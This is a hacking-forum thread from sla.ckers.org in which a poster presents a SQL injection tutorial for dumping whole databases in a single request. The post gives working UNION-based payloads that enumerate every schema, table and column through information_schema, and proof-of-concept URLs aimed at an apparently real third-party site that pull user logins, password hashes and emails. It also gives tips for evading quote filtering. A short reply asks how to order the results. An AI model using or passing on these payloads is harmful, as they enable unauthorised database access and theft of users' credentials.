Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
TUTORIAL : [All DB In [1] Request]
Posted by: blackrose
Date: May 31, 2012 04:00PM

greetz to ๖ۣۜDan & DenJacker

What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests.


First of, the database/table/columns.

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)

PoC:

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+




Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function.

View the source, and we see every single database/table/column accessible.


[spoiler][/spoiler]




Now, to grab information from the columns.


(select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)


POC

http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+



Thanks for viewing this tutorial. If you need help, post below. If you have anything you want added, post below or pm me. Thanks

Options: ReplyQuote
Re: TUTORIAL : [All DB In [1] Request]
Posted by: Freesia
Date: July 06, 2014 07:25AM

Thank you blackrose, very nice trick!
my question is how can I order the results, for example in your demo order by ID

Options: ReplyQuote


Sorry, only registered users may post in this forum.